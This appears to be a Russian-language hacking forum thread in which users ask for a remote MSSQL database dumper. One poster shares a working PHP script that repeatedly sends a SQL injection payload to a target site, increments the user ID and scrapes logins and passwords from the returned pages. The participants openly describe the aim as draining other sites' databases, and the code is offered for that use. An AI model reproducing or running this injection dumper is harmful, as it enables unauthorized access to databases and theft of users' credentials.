Нужен удаленный дампер mssql. Тот, что от Кэша с лимитом. Тот, что от СКЛХАК`а хз как с mssql работает. Поделитесь, у кого есть.
Епта я его не куда заливал что бы перезаливать. Научись формулировать мысли. Удаленные дампер через иньекцию.
Как я понял постановку задачи: тебе нужно слить базу какого-то ресурса, используя инъекцию. Тоесть выводится по одному юзеру и нужно постоянно увеличивать значения некого колумна-идентификатора юзера, так ? Например http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+uID=3)-- Если я правильно понял задачу (?), то могу поделится своим решением. Что нам мешает сделать скрипт на базе сокетов и http протокола вот такого типа PHP: <?php $PORT = 80; // рабочий порт $ADDR = gethostbyname("site.com"); // ресурс, базу которой мы сливаем //каждую итерацию цикла мы извлекаем одного юзера for($n = 0;$n < 1000;$n++) { $fp = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // создаем сокет socket_connect($fp,$ADDR,$PORT); // конектимся к нужному ресурсу //отправляем http- запрос, в котором содержится инъекция $str1 = "GET http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nv archar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+uID="; $str2 = ")-- HTTP/1.0\r\n Host: site.com\r\n\r\n"; $str = $str1.$n.$str2; // значение uID в инъекции соответствует значению параметра цикла $n socket_write($fp,$str,strlen($str)); //отправляем слепленную строку while($out = socket_read($fp,2048)) // читаем ответ сервера - это исходный код html-страницы { //Фильтрация полученной страницы - нам нужно извлечь необходимые данные. Для каждого сайта //будет своя фильтрация //Например если нужные нам данные выводятся в заголовок страницы: // <html> // <title> login;password;email </title> // ... // </html> $s = strstr($out,"<title>"); $nm = strpos($s,"</title>"); $result = substr($s,7,$nm - 7); //Конец фильтрации echo $result; // выводим результат или пишем его в файл } echo "<br>"; //выводим каждого юзера с новой строки socket_close($fp); //завершаем роботу с сокетом }// конец for ?> Думаю принцип понятен - в комментариях все написано. Правда я делал скрипт для сливания баз с сайтов с MySQL инъекцией (вот почему и нужно делать свою фильтрацию для каждого сайта), но его элементарные принципы позволяют работать и с MSSQL. Примитивно - зато работает
to xena-mil1 врядли перспективная...в локалке, частный случай...хотя и в ИНЕТЕ наверно база знаний la2info встречается ... P.S. Так как такими вещами не занимаюсь постоянно(только пытаться начал учиться), то могу гарантировать, что если дашь свой скрипт, то никому больше не дам В любом случае за любую помощь буду благодарен)... если не трудно глянь ветку _http://forum.antichat.ru/threadnav65041-5-10.html
